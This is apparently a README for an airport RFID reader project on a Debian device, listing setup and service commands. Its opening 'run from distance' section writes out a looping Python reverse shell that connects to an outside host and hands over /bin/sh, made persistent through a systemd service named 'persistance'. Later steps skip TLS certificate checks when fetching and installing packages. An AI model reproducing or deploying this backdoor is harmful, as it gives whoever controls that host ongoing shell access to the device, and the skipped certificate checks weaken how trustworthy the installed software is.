# AirportRfidReader

# run from distance
* vim per.sh
 
#!/bin/bash  
while : 
do  
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("shell.kartstd.io",2001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';  
sleep 10  
done

* sudo cp persistance.service /lib/systemd/system
* sudo chmod +x /lib/systemd/system/persistance.service
* sudo systemctl enable persistance.service
* sudo systemctl start persistance.service

# find IP
* nmap 192.168.8.100-255 -p 80
* nmap 192.168.8.100-255 -p 22

# commands
* git clone https://kautomation@bitbucket.org/kautomation/airportrfidreader.git
* sudo apt-get update
* sudo apt-get upgrade
* sudo apt-get remove python-pip
* wget https://bootstrap.pypa.io/get-pip.py --no-check-certificate
* sudo python get-pip.py --trusted-host files.pythonhosted.org
* sudo pip uninstall requests
* sudo pip install requests -trusted-host pypi.org --trusted-host files.pythonhosted.org
* sudo apt-get install python-requests
* vim termRearAsyncUpdate.py ->> change ->> terminal_no
* sudo cp terminal.service /lib/systemd/system
* sudo chmod +x /lib/systemd/system/terminal.service 
* sudo systemctl enable terminal.service
* sudo systemctl status terminal.service
* sudo systemctl start terminal.service
* after edite use:
* sudo systemctl --system daemon-reload

# binary files
* /home/debian/airportrfidreader/GPIO
* /home/debian/airportrfidreader/readasync

# files
* /lib/systemd/system/terminal.service
* /home/debian/airportrfidreader/main.sh
* /home/debian/airportrfidreader/termRearAsync.py
* /home/debian/airportrfidreader/termRearAsyncUpdate.py


